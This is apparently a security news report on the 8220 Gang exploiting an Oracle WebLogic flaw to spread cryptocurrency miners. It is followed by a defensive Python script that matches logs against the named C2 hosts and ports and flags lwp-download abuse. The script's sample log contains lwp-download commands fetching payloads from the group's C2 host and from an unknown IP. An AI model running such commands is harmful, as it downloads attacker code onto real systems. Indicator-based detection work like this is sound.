The infamous cryptojacking group tracked as 8220 Gang has been observed weaponizing a six-year-old security flaw in Oracle WebLogic servers to ensnare vulnerable instances into a botnet and distribute cryptocurrency mining malware.
The flaw in question is CVE-2017-3506 (CVSS score: 7.4), which, if successfully exploited, could allow unauthenticated attackers to remotely execute arbitrary commands.
“This could allow attackers to gain unauthorized access to sensitive data or compromise the entire system,” Trend Micro researcher Sunil Bharti said in a report published this week.
8220 Gang, first documented by Cisco Talos in late 2018, is so named because of its original use of port 8220 for command-and-control (C2) network communications.
“8220 Gang identifies targets through scanning of misconfigured or vulnerable hosts on the public internet,” SentinelOne noted last year. “8220 Gang is known to use post-infection SSH brute force attacks for the purpose of lateral movement within compromised networks.”
Earlier this year, Sysdig detailed attacks carried out by a “low-skilled” crimeware group between November 2022 and January 2023 that aimed to penetrate vulnerable Oracle WebLogic and Apache web servers and spread cryptocurrency miners.
It has also been observed using a ready-made malware downloader known as PureCrypter as well as a crypter codenamed ScrubCrypt to hide miner payloads and avoid detection by security software.
In the most recent attack chain documented by Trend Micro, the Oracle WebLogic Server vulnerability was exploited to deliver PowerShell payloads, which were then used to create other PowerShell scripts that were obfuscated in memory.
This newly created PowerShell script disables Windows Antimalware Scan Interface (AMSI) detection and launches a Windows binary, which then reaches out to the remote server to retrieve the “meticulously disguised” payload.
An intermediate DLL file, for its part, is configured to download cryptocurrency miners from one of three C2 servers – 179.43.155(.)202, work.letmaker(.)top, and su-94.letmaker(.)top – over TCP port 9090, 9091, or 9092.
Trend Micro said the recent attacks also led to the misuse of the legitimate Linux tool lwp-download to store arbitrary files on the compromised host.
“lwp-download is a Linux utility that comes on a number of platforms by default, and 8220 Gang making it part of any malware routine can affect a number of services, even if it’s reused more than once,” said Bharti.
“Given threat actors’ tendency to reuse tools for different campaigns and to abuse legitimate tools as part of their arsenal, an organization’s security team may be challenged to find other detection and blocking solutions to counter attacks that abuse these utilities.”
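The two detection opportunities the report leaves a defender with are the C2 hosts and ports named above and the abuse of lwp-download. The following script is an added example, not code from Trend Micro or from the article: it matches constructed network and process log lines (the `NET`/`PROC` key=value format is invented for the example) against the indicators quoted in the text and flags any lwp-download execution that fetches from a host outside a hypothetical allowlist. Port-only matches are reported at low severity, since 9090-9092 are also common legitimate admin ports.

```python
"""Indicator matching for the 8220 Gang activity described above.

Added example (not from Trend Micro or the article). The log format is
constructed for this example; the C2 hosts and ports come from the report.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Indicators from the report (written plainly here, not defanged, so they
# can be compared against log fields).
C2_HOSTS = {"179.43.155.202", "work.letmaker.top", "su-94.letmaker.top"}
C2_PORTS = {9090, 9091, 9092}

# Hypothetical allowlist: hosts lwp-download is legitimately used with here.
LWP_ALLOWED_HOSTS = {"mirror.internal.example"}

# Constructed log format: "<timestamp> <NET|PROC> key=value key="quoted value" ..."
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<kind>NET|PROC)\s+(?P<rest>.*)$")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
URL_RE = re.compile(r"https?://\S+")


@dataclass
class Alert:
    ts: str
    rule: str
    severity: str
    detail: str


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one constructed log line into a field dict; None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    fields = {k: v.strip('"') for k, v in KV_RE.findall(m.group("rest"))}
    fields["ts"] = m.group("ts")
    fields["kind"] = m.group("kind")
    return fields


def check_network(f: Dict[str, str]) -> Optional[Alert]:
    """Flag connections to the named C2 hosts (high) or C2 ports only (low)."""
    dst = f.get("dst", "")
    try:
        dport = int(f.get("dport", "0"))
    except ValueError:
        dport = 0
    if dst in C2_HOSTS:
        return Alert(f["ts"], "8220_c2_host", "high", f"{f.get('src')} -> {dst}:{dport}")
    if dport in C2_PORTS:
        # Port alone is a weak signal; surface it for review, not as a confirmed hit.
        return Alert(f["ts"], "8220_c2_port", "low", f"{f.get('src')} -> {dst}:{dport}")
    return None


def check_process(f: Dict[str, str]) -> Optional[Alert]:
    """Flag lwp-download fetches whose URL host is not on the allowlist."""
    cmd = f.get("cmd", "")
    if "lwp-download" not in cmd:
        return None
    m = URL_RE.search(cmd)
    host = urlparse(m.group(0)).hostname if m else None
    if host in LWP_ALLOWED_HOSTS:
        return None
    severity = "high" if host in C2_HOSTS else "medium"
    return Alert(f["ts"], "lwp_download_fetch", severity,
                 f"host={f.get('host')} url_host={host} cmd={cmd}")


def scan(lines: List[str]) -> List[Alert]:
    """Run both rules over a list of log lines and return the alerts raised."""
    alerts: List[Alert] = []
    for line in lines:
        f = parse_line(line)
        if f is None:
            continue
        alert = check_network(f) if f["kind"] == "NET" else check_process(f)
        if alert is not None:
            alerts.append(alert)
    return alerts


# Constructed sample log (internal 10.x hosts and 203.0.113.5 are made up).
SAMPLE_LOG = [
    '2023-05-17T10:01:02Z NET src=10.0.5.12 dst=work.letmaker.top dport=9090 proto=tcp',
    '2023-05-17T10:01:03Z NET src=10.0.5.12 dst=10.0.0.8 dport=9090 proto=tcp',
    '2023-05-17T10:01:04Z NET src=10.0.5.13 dst=updates.example.org dport=443 proto=tcp',
    '2023-05-17T10:02:10Z PROC host=web01 user=oracle cmd="lwp-download http://su-94.letmaker.top:9092/x.bin /tmp/x"',
    '2023-05-17T10:02:11Z PROC host=web02 user=build cmd="lwp-download http://mirror.internal.example/pkg.tgz /tmp/pkg.tgz"',
    '2023-05-17T10:02:12Z PROC host=web03 user=root cmd="lwp-download http://203.0.113.5/a.sh /tmp/a.sh"',
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"[{a.severity}] {a.ts} {a.rule}: {a.detail}")
```

Run against the sample, the script raises four alerts: the connection to work.letmaker.top (high), the internal connection on port 9090 (low, for review), the lwp-download fetch from su-94.letmaker.top (high), and the fetch from the unknown 203.0.113.5 host (medium); the fetch from the allowlisted mirror is ignored. Rules keyed to the tool and its destination rather than to a specific hash are what the report's closing point calls for, since the same utility is reused across campaigns.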